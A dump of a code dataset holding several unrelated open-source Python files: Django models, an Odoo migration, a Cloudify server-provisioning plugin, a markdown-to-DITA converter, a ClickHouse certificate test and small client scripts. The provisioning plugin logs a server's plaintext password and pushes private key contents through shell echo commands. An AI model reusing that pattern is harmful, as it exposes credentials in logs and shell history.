hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
248
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
248
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
248
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
2.06M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.03M
| alphanum_fraction
float64 0
1
| count_classes
int64 0
1.6M
| score_classes
float64 0
1
| count_generators
int64 0
651k
| score_generators
float64 0
1
| count_decorators
int64 0
990k
| score_decorators
float64 0
1
| count_async_functions
int64 0
235k
| score_async_functions
float64 0
1
| count_documentation
int64 0
1.04M
| score_documentation
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
dc077fe63cc4f8d54762c53d45a473600de38902 | 3,843 | py | Python | instagram/models.py | kilonzijnr/instagram-clone | 1fa662248d70a64356ef3d48d52c7e38dea95aff | [
"MIT"
]
| null | null | null | instagram/models.py | kilonzijnr/instagram-clone | 1fa662248d70a64356ef3d48d52c7e38dea95aff | [
"MIT"
]
| null | null | null | instagram/models.py | kilonzijnr/instagram-clone | 1fa662248d70a64356ef3d48d52c7e38dea95aff | [
"MIT"
]
| null | null | null | from django.db import models
from django.db.models.deletion import CASCADE
from django.contrib.auth.models import User
from cloudinary.models import CloudinaryField
# Create your models here.
class Profile(models.Model):
"""Model for handling User Profile"""
user = models.OneToOneField(User, on_delete= models.CASCADE)
username = models.CharField(max_length = 25)
signup_date = models.DateTimeField(auto_now_add= True)
profile_photo = CloudinaryField('images')
followers = models.ManyToManyField(User, related_name='followers', blank= True)
bio = models.CharField(max_length= 70)
def __str__(self):
return self.name
def total_followers(self):
"""Method to return total numberof followers"""
return self.followers.count()
def save_profile(self):
"""Method to save profile to the database"""
self.save()
def delete_profile(self):
"""Method to delete profile from the database"""
self.delete()
def update_profile(self,new):
"""Method to update user profile
Args:
new([type]): [description]
"""
self.username = new.username
self.bio = new.bio
self.profile_photo = new.profile_pic
self.save()
@classmethod
def get_following(cls,user):
"""Method to return all users a specific user is following """
following = user.followers.all()
users = []
for profile in following:
user = User.objects.get(profile = profile)
users.append(user)
return users
@classmethod
def search_profile(cls,search_term):
"""Method to return profiles with a provided search term"""
profiles = cls.objects.filter(username_icontains = search_term)
return profiles
class Likes(models.Model):
"""Model for handling Image likes"""
likes = models.IntegerField(default=0)
class Image(models.Model):
"""Model for handling Image posts by users"""
user = models.ForeignKey(User,on_delete= models.CASCADE)
image = CloudinaryField('images')
image_name = models.CharField(max_length= 25)
caption = models.CharField(max_length= 100)
profile = models.ForeignKey(Profile, on_delete=models.CASCADE, default= None)
likes = models.ForeignKey(Likes, on_delete=CASCADE, default=None)
comment = models.CharField(max_length= 120)
time_posted = models.DateTimeField(auto_now_add= True)
def __str__(self):
return self.name
def save_image(self):
"""Method to save Image to Database"""
self.save()
def delete_image(self):
"""Method to delete Image """
self.delete()
def like_image(self,user):
"""Method to add user as an image liker"""
self.likes.add(user)
def get_total_likes(self):
"""Method to get the total number of likess on an Image"""
return self.likes.count()
def update_caption(self,caption):
"""Method to updat eimage captions in database"""
self.caption = caption
self.save()
@classmethod
def get_images(cls,users):
"""Method to get a specific image"""
posts = []
for user in users:
images = Image.objects.filter(user = user)
for image in images:
posts.append(image)
return posts
def get_comments(self):
"""Method to get all comments related to a post"""
comments = Comments.objects.filter(image = self)
return comments
class Comments(models.Model):
"""Method to define attributes of a comment"""
user = models.ForeignKey(User, on_delete=models.CASCADE)
image = models.ForeignKey(Image,on_delete=models.CASCADE)
comment = models.TextField()
def __str__(self):
return self.comment
| 30.991935 | 83 | 0.650273 | 3,643 | 0.947957 | 0 | 0 | 817 | 0.212594 | 0 | 0 | 886 | 0.230549 |
dc0981553f7be2b377b0b4a03e7bcb8ef94d1db4 | 846 | py | Python | addons/purchase_request/migrations/13.0.4.0.0/post-migration.py | jerryxu4j/odoo-docker-build | 339a3229192582c289c19e276347af1326ce683f | [
"CC-BY-3.0"
]
| null | null | null | addons/purchase_request/migrations/13.0.4.0.0/post-migration.py | jerryxu4j/odoo-docker-build | 339a3229192582c289c19e276347af1326ce683f | [
"CC-BY-3.0"
]
| null | null | null | addons/purchase_request/migrations/13.0.4.0.0/post-migration.py | jerryxu4j/odoo-docker-build | 339a3229192582c289c19e276347af1326ce683f | [
"CC-BY-3.0"
]
| null | null | null | from odoo import SUPERUSER_ID, api
from odoo.tools.sql import column_exists
def migrate(cr, version=None):
env = api.Environment(cr, SUPERUSER_ID, {})
if column_exists(cr, "product_template", "purchase_request"):
_migrate_purchase_request_to_property(env)
def _migrate_purchase_request_to_property(env):
"""Create properties for all products with the flag set on all companies"""
env.cr.execute("select id, coalesce(purchase_request, False) from product_template")
values = dict(env.cr.fetchall())
for company in env["res.company"].with_context(active_test=False).search([]):
env["ir.property"].with_context(force_company=company.id).set_multi(
"purchase_request", "product.template", values, False,
)
env.cr.execute("alter table product_template drop column purchase_request")
| 42.3 | 88 | 0.734043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 300 | 0.35461 |
dc0a134e4c11e64835152cefa26ff2db3778cd60 | 13,678 | py | Python | cfy/server.py | buhanec/cloudify-flexiant-plugin | da0c42a4330c9e5ffd55d9f5024a9a36f052af16 | [
"Apache-2.0"
]
| null | null | null | cfy/server.py | buhanec/cloudify-flexiant-plugin | da0c42a4330c9e5ffd55d9f5024a9a36f052af16 | [
"Apache-2.0"
]
| null | null | null | cfy/server.py | buhanec/cloudify-flexiant-plugin | da0c42a4330c9e5ffd55d9f5024a9a36f052af16 | [
"Apache-2.0"
]
| null | null | null | # coding=UTF-8
"""Server stuff."""
from __future__ import print_function
from cfy import (create_server,
create_ssh_key,
attach_ssh_key,
wait_for_state,
wait_for_cond,
create_nic,
attach_nic,
get_resource,
get_server_status,
start_server,
stop_server,
delete_resource)
import socket
import errno
from cloudify import ctx
from cloudify.decorators import operation
from cloudify.exceptions import NonRecoverableError
from cfy.helpers import (with_fco_api, with_exceptions_handled)
from resttypes import enums, cobjects
from paramiko import SSHClient, AutoAddPolicy
import spur
import spur.ssh
from time import sleep
from subprocess import call
from fabric.api import settings, run
import os
RT = enums.ResourceType
PROP_RESOURCE_ID = 'resource_id'
PROP_USE_EXISTING = 'use_existing'
PROP_IMAGE = 'image'
PROP_VDC = 'vdc'
PROP_NET = 'network'
PROP_SERVER_PO = 'server_type'
PROP_CPU_COUNT = 'cpu_count'
PROP_RAM_AMOUNT = 'ram_amount'
PROP_MANAGER_KEY = 'manager_key'
PROP_PRIVATE_KEYS = 'private_keys'
PROP_PUBLIC_KEYS = 'public_keys'
RPROP_UUID = 'uuid'
RPROP_DISKS = 'disks'
RPROP_NIC = 'nic'
RPROP_NICS = 'nics'
RPROP_IP = 'ip'
RPROP_USER = 'username'
RPROP_PASS = 'password'
@operation
@with_fco_api
@with_exceptions_handled
def create(fco_api, *args, **kwargs):
ctx.logger.info('starting server creation')
# Ease of access
_rp = ctx.instance.runtime_properties
_np = ctx.node.properties
# Check if existing server is to be used
if _np[PROP_USE_EXISTING]:
server = get_resource(fco_api, _np[PROP_RESOURCE_ID, RT.SERVER])
if not server.nics:
raise Exception('No NICs attached to server')
_rp[RPROP_UUID] = server.resourceUUID
_rp[RPROP_DISKS] = [d.resourceUUID for d in server.disks]
_rp[RPROP_NIC] = server.nics[0].resourceUUID
_rp[RPROP_NICS] = [n.resourceUUID for n in server.nics]
_rp[RPROP_IP] = server.nics[0].ipAddresses[0].ipAddress
_rp[RPROP_USER] = server.initialUser
_rp[RPROP_PASS] = server.initialPassword
return (_rp[RPROP_UUID], _rp[RPROP_IP], _rp[RPROP_USER],
_rp[RPROP_PASS])
# Get configuration
image = get_resource(fco_api, _np[PROP_IMAGE], RT.IMAGE)
if _np[PROP_IMAGE]:
vdc = get_resource(fco_api, _np[PROP_VDC], RT.VDC)
else:
vdc = None
network = get_resource(fco_api, _np[PROP_NET], RT.NETWORK)
server_po = get_resource(fco_api, _np[PROP_SERVER_PO], RT.PRODUCTOFFER)
manager_key = get_resource(fco_api, _np[PROP_MANAGER_KEY], RT.SSHKEY)
cpu_count = _np[PROP_CPU_COUNT]
ram_amount = _np[PROP_RAM_AMOUNT]
public_keys = _np[PROP_PUBLIC_KEYS] or []
private_keys = _np[PROP_PRIVATE_KEYS] or []
# Verify existence of private keys
missing_keys = set()
bad_permission_keys = set()
key_contents = {}
for key in private_keys:
try:
key_contents[key] = ctx.get_resource(os.path.expanduser(key))
except NonRecoverableError as e:
if 'HttpException: 404' in str(e):
missing_keys.add(key)
elif 'HttpException: 403' in str(e):
bad_permission_keys.add(key)
else:
raise
if missing_keys or bad_permission_keys:
raise Exception('Missing private keys: {}\nBad permission keys: {}'
.format(missing_keys, bad_permission_keys))
# Generate missing configuration
image_uuid = image.resourceUUID
if vdc is not None:
cluster_uuid = vdc.clusterUUID
vdc_uuid = vdc.resourceUUID
else:
cluster_uuid = image.clusterUUID
vdc_uuid = image.vdcUUID
network_uuid = network.resourceUUID
network_type = network.networkType
server_po_uuid = server_po.resourceUUID
manager_key_uuid = manager_key.resourceUUID
# TODO: better way of determining suitable disk
boot_disk_po_uuid = get_resource(fco_api,
'{} GB Storage Disk'.format(image.size),
RT.PRODUCTOFFER).resourceUUID
ctx.logger.info('Configuration: \n'
'image_uuid: %s\n'
'cluster_uuid: %s\n'
'vdc_uuid: %s\n'
'network_uuid: %s\n'
'server_po_uuid: %s\n'
'manager_key_uuid: %s\n'
'boot_disk_po_uuid: %s',
image_uuid, cluster_uuid, vdc_uuid, network_uuid,
server_po_uuid, manager_key_uuid, boot_disk_po_uuid)
# Create server
server_name = '{}{}_{}'.format(ctx.bootstrap_context.resources_prefix,
ctx.deployment.id, ctx.instance.id)
try:
server_uuid = _rp[RPROP_UUID]
except KeyError:
# key_obj = get_resource(fco_api, key_uuid, RT.SSHKEY)
# keys = SSHKey.REQUIRED_ATTRIBS.copy()
# keys.add('resourceUUID')
# submit_key = {}
# for k in keys:
# try:
# submit_key[k] = getattr(manager_key, k)
# except AttributeError:
# submit_key[k] = None
server_uuid = create_server(fco_api, server_po_uuid, image_uuid,
cluster_uuid, vdc_uuid, cpu_count,
ram_amount, boot_disk_po_uuid,
[manager_key], server_name)
_rp[RPROP_UUID] = server_uuid
ctx.logger.info('server_uuid: %s', server_uuid)
server = get_resource(fco_api, server_uuid, RT.SERVER)
server_nics = [nic.resourceUUID for nic in server.nics]
server_keys = [key.resourceUUID for key in server.sshkeys]
# Wait for server to be active
if not wait_for_state(fco_api, server_uuid, enums.ResourceState.ACTIVE,
RT.SERVER):
raise Exception('Server failed to prepare in time!')
ctx.logger.info('Server ACTIVE')
# Add keys
new_keys = set()
for key in public_keys:
if key not in server_keys:
key_uuid = create_ssh_key(fco_api, key, server_name + ' Key')
attach_ssh_key(fco_api, server_uuid, key_uuid)
new_keys.add(key_uuid)
ctx.logger.info('Keys attached: %s', new_keys)
# Create NIC
try:
nic_uuid = _rp[RPROP_NIC]
except KeyError:
nic_uuid = create_nic(fco_api, cluster_uuid, network_type,
network_uuid, vdc_uuid, server_name + ' NIC')
if not wait_for_state(fco_api, nic_uuid, enums.ResourceState.ACTIVE,
RT.NIC):
raise Exception('NIC failed to create in time!')
_rp[RPROP_NIC] = nic_uuid
ctx.logger.info('nic_uuid: %s', nic_uuid)
# Stop server if started
if get_server_status(fco_api, server_uuid) != enums.ServerStatus.STOPPED:
if not stop_server(fco_api, server_uuid):
raise Exception('Stopping server failed to complete in time!')
ctx.logger.info('Server STOPPED')
# Attach NIC
if nic_uuid not in server_nics:
job_uuid = attach_nic(fco_api, server_uuid, nic_uuid, 1).resourceUUID
cond = cobjects.Job.status == enums.JobStatus.SUCCESSFUL
if not wait_for_cond(fco_api, job_uuid, cond, RT.JOB):
raise Exception('Attaching NIC failed to complete in time!')
ctx.logger.info('NICs attached')
else:
ctx.logger.info('NICs already attached')
# Start server if not started
if get_server_status(fco_api, server_uuid) == enums.ServerStatus.STOPPED:
if not start_server(fco_api, server_uuid):
raise Exception('Running server failed to complete in time!')
ctx.logger.info('Server RUNNING')
nic = get_resource(fco_api, nic_uuid, RT.NIC)
server_ip = nic.ipAddresses[0].ipAddress
server_port = 22
ctx.logger.info('Server READY')
username = server.initialUser
password = server.initialPassword
ssh_attempts = -1
ssh_delay = 3
# Fabric test
while ssh_attempts:
ctx.logger.info('Attempting to SSH ({})'.format(ssh_attempts))
try:
with settings(host_string=server_po_uuid, user=username,
password=password, disable_known_hosts=True,
abort_exception=Exception):
run('mkdir ~/.ssh')
run('chmod 0700 ~/.ssh')
for key, key_content in key_contents.items():
remote = os.path.join('~', '.ssh', os.path.basename(key))
run('echo \'{}\' > {}'.format(key_content, remote))
run('chmod 0600 ' + remote)
ctx.logger.info('Done')
break
except Exception as e:
ctx.logger.info(e)
ssh_attempts -= 1
else:
raise Exception('Failed to provision keys in time')
# # Spur test
# while ssh_attempts:
# ctx.logger.info('Attempting to SSH ({})'.format(ssh_attempts))
# shell = spur.SshShell(
# hostname=server_ip,
# port=server_port,
# username=username,
# password=password,
# shell_type=spur.ssh.ShellTypes.minimal,
# missing_host_key=spur.ssh.MissingHostKey.accept
# )
# with shell:
# try:
# ctx.logger.info('Creating & chmoding .ssh')
# shell.run(['mkdir', '~/.ssh'])
# shell.run(['chmod', '0700', '~/.ssh'])
# for key, key_content in key_contents.items():
# ctx.logger.info('Adding private key: ' + remote)
# remote = os.path.join('~', '.ssh', os.path.basename(key))
# shell.run(['echo', "'{}'".format(key_content), '>',
# remote])
# shell.run(['chmod', '0600', remote])
# except spur.ssh.ConnectionError as e:
# if e.original_error[0] not in {errno.ECONNREFUSED,
# errno.EHOSTUNREACH}:
# raise
# sleep(ssh_delay)
# ssh_attempts -= 1
# else:
# raise Exception('Failed to provision keys in time')
# # Provision private keys
# ssh = SSHClient()
# call(['ssh-keygen', '-R', server_ip])
# ssh.set_missing_host_key_policy(AutoAddPolicy())
#
# while ssh_attempts:
# try:
# ctx.logger.info('Attempting to SSH ({})'.format(ssh_attempts))
# ctx.logger.info('SSH Connection details: {}'.format(
# ((server_ip, server_port, username, password, ssh_delay))))
# ssh.connect(server_ip, server_port, username, password,
# timeout=ssh_delay, look_for_keys=False)
# ctx.logger.info('SSH connection established')
# break
# except socket.timeout:
# ssh_attempts -= 1
# except socket.error as e:
# if e[0] not in {errno.ECONNREFUSED, errno.EHOSTUNREACH}:
# ctx.logger.info('SSH connection failed: %s', e[0])
# raise
# sleep(ssh_delay)
# ssh_attempts -= 1
# else:
# raise Exception('Failed to provision keys in time')
# ssh.exec_command('mkdir ~/.ssh')
# ssh.exec_command('chmod 0700 ~/.ssh')
# for key, key_content in key_contents.items():
# remote = os.path.join('~', '.ssh', os.path.basename(key))
# ssh.exec_command('echo \'{}\' > {}'.format(key_content, remote))
# ssh.exec_command('chmod 0600 ' + remote)
_rp[RPROP_UUID] = server_uuid
_rp[RPROP_IP] = server_ip
_rp[RPROP_USER] = username
_rp[RPROP_PASS] = password
server = get_resource(fco_api, server_uuid, RT.SERVER)
_rp[RPROP_DISKS] = [d.resourceUUID for d in server.disks]
_rp[RPROP_NICS] = [n.resourceUUID for n in server.nics]
ctx.logger.info('Server IP: ' + server_ip)
ctx.logger.info('Server User: ' + username)
ctx.logger.info('Server Password: ' + password)
return server_uuid, server_ip, username, password
@operation
@with_fco_api
@with_exceptions_handled
def delete(fco_api, *args, **kwargs):
server_uuid = ctx.instance.runtime_properties.get(RPROP_UUID)
job_uuid = delete_resource(fco_api, server_uuid, RT.SERVER, True) \
.resourceUUID
cond = cobjects.Job.status == enums.JobStatus.SUCCESSFUL
if not wait_for_cond(fco_api, job_uuid, cond, RT.JOB):
raise Exception('Failed to delete server')
@operation
@with_fco_api
@with_exceptions_handled
def start(fco_api, *args, **kwargs):
server_uuid = ctx.instance.runtime_properties.get(RPROP_UUID)
if get_server_status(fco_api, server_uuid) != enums.ServerStatus.RUNNING:
if not start_server(fco_api, server_uuid):
raise Exception('Could not start server!')
@operation
@with_fco_api
@with_exceptions_handled
def stop(fco_api, *args, **kwargs):
server_uuid = ctx.instance.runtime_properties.get(RPROP_UUID)
if get_server_status(fco_api, server_uuid) != enums.ServerStatus.STOPPED:
if not stop_server(fco_api, server_uuid):
raise Exception('Could not stop server!')
@operation
@with_fco_api
@with_exceptions_handled
def creation_validation(fco_api, *args, **kwargs):
server_uuid = ctx.instance.runtime_properties.get(RPROP_UUID)
try:
get_resource(fco_api, server_uuid, RT.SERVER)
except Exception:
return False
return True
| 36.281167 | 79 | 0.615222 | 0 | 0 | 0 | 0 | 12,294 | 0.898816 | 0 | 0 | 4,192 | 0.306478 |
dc0ae53c3bb6f54a76cfb756f32ba1e86d22317c | 7,317 | py | Python | markdown2dita.py | mattcarabine/markdown2dita | f4a02c3e9514d33eb3cea9c9b5d3c44817afad97 | [
"BSD-3-Clause"
]
| 6 | 2019-06-28T12:47:01.000Z | 2022-02-14T18:18:53.000Z | markdown2dita.py | mattcarabine/markdown2dita | f4a02c3e9514d33eb3cea9c9b5d3c44817afad97 | [
"BSD-3-Clause"
]
| null | null | null | markdown2dita.py | mattcarabine/markdown2dita | f4a02c3e9514d33eb3cea9c9b5d3c44817afad97 | [
"BSD-3-Clause"
]
| 2 | 2018-02-09T22:17:48.000Z | 2020-02-20T13:59:30.000Z | # coding: utf-8
"""
markdown2dita
~~~~~~~~~~~~~
A markdown to dita-ot conversion tool written in pure python.
Uses mistune to parse the markdown.
"""
from __future__ import print_function
import argparse
import sys
import mistune
__version__ = '0.3'
__author__ = 'Matt Carabine <[email protected]>'
__all__ = ['Renderer', 'Markdown', 'markdown', 'escape']
class Renderer(mistune.Renderer):
def codespan(self, text):
return '<codeph>{0}</codeph>'.format(escape(text.rstrip()))
def link(self, link, title, content):
return '<xref href="{0}">{1}</xref>'.format(link, escape(content or title))
def block_code(self, code, language=None):
code = escape(code.rstrip('\n'))
if language:
return ('<codeblock outputclass="language-{0}">{1}</codeblock>'
.format(language, code))
else:
return '<codeblock>{0}</codeblock>'.format(code)
def block_quote(self, text):
return '<codeblock>{0}</codeblock>'.format(text)
def header(self, text, level, raw=None):
# Dita only supports one title per section
title_level = self.options.get('title_level', 2)
if level <= title_level:
return '</section><section><title>{0}</title>'.format(text)
else:
return '<p><b>{0}</b></p>'.format(text)
def double_emphasis(self, text):
return '<b>{0}</b>'.format(text)
def emphasis(self, text):
return '<i>{0}</i>'.format(text)
def hrule(self):
# Dita has no horizontal rule, ignore it
# could maybe divide sections?
return ''
def inline_html(self, text):
# Dita does not support inline html, just pass it through
return text
def list_item(self, text):
return '<li>{0}</li>'.format(text)
def list(self, body, ordered=True):
if ordered:
return '<ol>{0}</ol>'.format(body)
else:
return '<ul>{0}</ul>'.format(body)
def image(self, src, title, text):
# Derived from the mistune library source code
src = mistune.escape_link(src)
text = escape(text, quote=True)
if title:
title = escape(title, quote=True)
output = ('<fig><title>{0}</title>\n'
'<image href="{1}" alt="{2}"/></fig>'
.format(title, src, text))
else:
output = '<image href="{0}" alt="{1}"/>'.format(src, text)
return output
def table(self, header, body, cols):
col_string = ['<colspec colname="col{0}"/>'.format(x+1)
for x in range(cols)]
output_str = ('<table>\n<tgroup cols="{0}">\n{1}\n'
.format(cols, '\n'.join(col_string)))
return (output_str + '<thead>\n' + header + '</thead>\n<tbody>\n' +
body + '</tbody>\n</tgroup>\n</table>')
def table_row(self, content):
return '<row>\n{0}</row>\n'.format(content)
def table_cell(self, content, **flags):
align = flags['align']
if align:
return '<entry align="{0}">{1}</entry>\n'.format(align, content)
else:
return '<entry>{0}</entry>\n'.format(content)
def autolink(self, link, is_email=False):
text = link = escape(link)
if is_email:
link = 'mailto:{0}'.format(link)
return '<xref href="{0}">{1}</xref>'.format(link, text)
def footnote_ref(self, key, index):
return ''
def footnote_item(self, key, text):
return ''
def footnotes(self, text):
return ''
def strikethrough(self, text):
return text
class Markdown(mistune.Markdown):
def __init__(self, renderer=None, inline=None, block=None, **kwargs):
if not renderer:
renderer = Renderer(**kwargs)
else:
kwargs.update(renderer.options)
super(Markdown, self).__init__(
renderer=renderer, inline=inline, block=block)
def parse(self, text, page_id='enter-id-here',
title='Enter the page title here'):
output = super(Markdown, self).parse(text)
if output.startswith('</section>'):
output = output[9:]
else:
output = '<section>\n' + output
output = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE concept PUBLIC "-//OASIS//DTD DITA Concept//EN" "concept.dtd">
<concept xml:lang="en-us" id="{0}">
<title>{1}</title>
<shortdesc>Enter the short description for this page here</shortdesc>
<conbody>
{2}</section>
</conbody>
</concept>""".format(page_id, title, output)
return output
def output_table(self):
# Derived from the mistune library source code
aligns = self.token['align']
aligns_length = len(aligns)
cell = self.renderer.placeholder()
# header part
header = self.renderer.placeholder()
cols = len(self.token['header'])
for i, value in enumerate(self.token['header']):
align = aligns[i] if i < aligns_length else None
flags = {'header': True, 'align': align}
cell += self.renderer.table_cell(self.inline(value), **flags)
header += self.renderer.table_row(cell)
# body part
body = self.renderer.placeholder()
for i, row in enumerate(self.token['cells']):
cell = self.renderer.placeholder()
for j, value in enumerate(row):
align = aligns[j] if j < aligns_length else None
flags = {'header': False, 'align': align}
cell += self.renderer.table_cell(self.inline(value), **flags)
body += self.renderer.table_row(cell)
return self.renderer.table(header, body, cols)
def escape(text, quote=False, smart_amp=True):
return mistune.escape(text, quote=quote, smart_amp=smart_amp)
def _parse_args(args):
parser = argparse.ArgumentParser(description='markdown2dita - a markdown '
'to dita-ot CLI conversion tool.')
parser.add_argument('-i', '--input-file',
help='input markdown file to be converted.'
'If omitted, input is taken from stdin.')
parser.add_argument('-o', '--output-file',
help='output file for the converted dita content.'
'If omitted, output is sent to stdout.')
return parser.parse_args(args)
def markdown(text, escape=True, **kwargs):
return Markdown(escape=escape, **kwargs)(text)
def main():
parsed_args = _parse_args(sys.argv[1:])
if parsed_args.input_file:
input_str = open(parsed_args.input_file, 'r').read()
elif not sys.stdin.isatty():
input_str = ''.join(line for line in sys.stdin)
else:
print('No input file specified and unable to read input on stdin.\n'
"Use the '-h' or '--help' flag to see usage information",
file=sys.stderr)
exit(1)
markdown = Markdown()
dita_output = markdown(input_str)
if parsed_args.output_file:
with open(parsed_args.output_file, 'w') as output_file:
output_file.write(dita_output)
else:
print(dita_output)
if __name__ == '__main__':
main()
| 31.403433 | 83 | 0.577012 | 5,403 | 0.738417 | 0 | 0 | 0 | 0 | 0 | 0 | 2,009 | 0.274566 |
dc0c391d6f0cc20589629aa4ecb77f77c49b34a1 | 2,957 | py | Python | tests/integration/test_reload_certificate/test.py | roanhe-ts/ClickHouse | 22de534fdcd3f05e27423d13f5875f97c3ba5f10 | [
"Apache-2.0"
]
| 1 | 2022-02-08T03:09:51.000Z | 2022-02-08T03:09:51.000Z | tests/integration/test_reload_certificate/test.py | roanhe-ts/ClickHouse | 22de534fdcd3f05e27423d13f5875f97c3ba5f10 | [
"Apache-2.0"
]
| 1 | 2022-03-21T07:27:34.000Z | 2022-03-21T07:27:34.000Z | tests/integration/test_reload_certificate/test.py | roanhe-ts/ClickHouse | 22de534fdcd3f05e27423d13f5875f97c3ba5f10 | [
"Apache-2.0"
]
| null | null | null | import pytest
import os
from helpers.cluster import ClickHouseCluster
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
cluster = ClickHouseCluster(__file__)
node = cluster.add_instance('node', main_configs=["configs/first.crt", "configs/first.key",
"configs/second.crt", "configs/second.key",
"configs/cert.xml"])
@pytest.fixture(scope="module", autouse=True)
def started_cluster():
try:
cluster.start()
yield cluster
finally:
cluster.shutdown()
def change_config_to_key(name):
'''
* Generate config with certificate/key name from args.
* Reload config.
'''
node.exec_in_container(["bash", "-c" , """cat > /etc/clickhouse-server/config.d/cert.xml << EOF
<?xml version="1.0"?>
<clickhouse>
<https_port>8443</https_port>
<openSSL>
<server>
<certificateFile>/etc/clickhouse-server/config.d/{cur_name}.crt</certificateFile>
<privateKeyFile>/etc/clickhouse-server/config.d/{cur_name}.key</privateKeyFile>
<loadDefaultCAFile>true</loadDefaultCAFile>
<cacheSessions>true</cacheSessions>
<disableProtocols>sslv2,sslv3</disableProtocols>
<preferServerCiphers>true</preferServerCiphers>
</server>
</openSSL>
</clickhouse>
EOF""".format(cur_name=name)])
node.query("SYSTEM RELOAD CONFIG")
def test_first_than_second_cert():
''' Consistently set first key and check that only it will be accepted, then repeat same for second key. '''
# Set first key
change_config_to_key('first')
# Command with correct certificate
assert node.exec_in_container(['curl', '--silent', '--cacert', '/etc/clickhouse-server/config.d/{cur_name}.crt'.format(cur_name='first'),
'https://localhost:8443/']) == 'Ok.\n'
# Command with wrong certificate
# This command don't use option '-k', so it will lead to error while execution.
# That's why except will always work
try:
node.exec_in_container(['curl', '--silent', '--cacert', '/etc/clickhouse-server/config.d/{cur_name}.crt'.format(cur_name='second'),
'https://localhost:8443/'])
assert False
except:
assert True
# Change to other key
change_config_to_key('second')
# Command with correct certificate
assert node.exec_in_container(['curl', '--silent', '--cacert', '/etc/clickhouse-server/config.d/{cur_name}.crt'.format(cur_name='second'),
'https://localhost:8443/']) == 'Ok.\n'
# Command with wrong certificate
# Same as previous
try:
node.exec_in_container(['curl', '--silent', '--cacert', '/etc/clickhouse-server/config.d/{cur_name}.crt'.format(cur_name='first'),
'https://localhost:8443/'])
assert False
except:
assert True
| 38.907895 | 142 | 0.622929 | 0 | 0 | 117 | 0.039567 | 163 | 0.055123 | 0 | 0 | 1,723 | 0.582685 |
dc0d2dd1628c5437389a9030a61c8c8847b09265 | 1,331 | py | Python | examples/python/fling.py | arminfriedl/fling | 909606a9960fede8951436748c20a9600819b93a | [
"MIT"
]
| null | null | null | examples/python/fling.py | arminfriedl/fling | 909606a9960fede8951436748c20a9600819b93a | [
"MIT"
]
| null | null | null | examples/python/fling.py | arminfriedl/fling | 909606a9960fede8951436748c20a9600819b93a | [
"MIT"
]
| null | null | null | import flingclient as fc
from flingclient.rest import ApiException
from datetime import datetime
# Per default the dockerized fling service runs on localhost:3000 In case you
# run your own instance, change the base url
configuration = fc.Configuration(host="http://localhost:3000")
# Every call, with the exception of `/api/auth`, is has to be authorized by a
# bearer token. Get a token by authenticating as admin and set it into the
# configuration. All subsequent calls will send this token in the header as
# `Authorization: Bearer <token> header`
def authenticate(admin_user, admin_password):
with fc.ApiClient(configuration) as api_client:
auth_client = fc.AuthApi(api_client)
admin_auth = fc.AdminAuth(admin_user, admin_password)
configuration.access_token = auth_client.authenticate_owner(admin_auth=admin_auth)
admin_user = input("Username: ")
admin_password = input("Password: ")
authenticate(admin_user, admin_password)
with fc.ApiClient(configuration) as api_client:
# Create a new fling
fling_client = fc.FlingApi(api_client)
fling = fc.Fling(name="A Fling from Python", auth_code="secret",
direct_download=False, allow_upload=True,
expiration_time=datetime(2099, 12, 12))
fling = fling_client.post_fling()
print(f"Created a new fling: {fling}")
#
| 40.333333 | 86 | 0.75432 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 515 | 0.386927 |
dc0d3f00ae59f64419ff5f7a5aba262466241f01 | 1,811 | py | Python | pretraining/python/download_tensorboard_logs.py | dl4nlp-rg/PTT5 | cee2d996ba7eac80d7764072eef01a7f9c38836c | [
"MIT"
]
| 51 | 2020-08-11T13:34:07.000Z | 2022-01-20T23:09:32.000Z | pretraining/python/download_tensorboard_logs.py | dl4nlp-rg/PTT5 | cee2d996ba7eac80d7764072eef01a7f9c38836c | [
"MIT"
]
| 4 | 2020-09-28T20:33:31.000Z | 2022-03-12T00:46:13.000Z | pretraining/python/download_tensorboard_logs.py | unicamp-dl/PTT5 | aee3e0d0b6ad1bb6f8c2d9afd1d2e89679301f6f | [
"MIT"
]
| 6 | 2021-01-25T07:47:40.000Z | 2022-02-23T20:06:03.000Z | import tensorflow.compat.v1 as tf
import os
import tqdm
GCS_BUCKET = 'gs://ptt5-1'
TENSORBOARD_LOGS_LOCAL = '../logs_tensorboard'
os.makedirs(TENSORBOARD_LOGS_LOCAL, exist_ok=True)
# where to look for events files - experiment names
base_paths = [
# Main initial experiments - all weights are updated
'small_standard_vocab',
'base_standard_vocab',
'large_standard_vocab',
'small_custom_sentencepiece_vocab',
'base_custom_sentencepiece_vocab',
'large_custom_sentencepiece_vocab',
# Only embeddings are updated
'small_embeddings_only_standard_vocab',
'base_embeddings_only_standard_vocab',
'large_embeddings_only_standard_vocab',
'small_embeddings_only_custom_sentencepiece_vocab',
'base_embeddings_only_custom_sentencepiece_vocab',
'large_embeddings_only_custom_sentencepiece_vocab',
# Double batch size for large (128 = 64 * 2)
'large_batchsize_128_custom_sentencepiece_vocab',
'large_batchsize_128_standard_vocab',
]
# all paths have the scructure
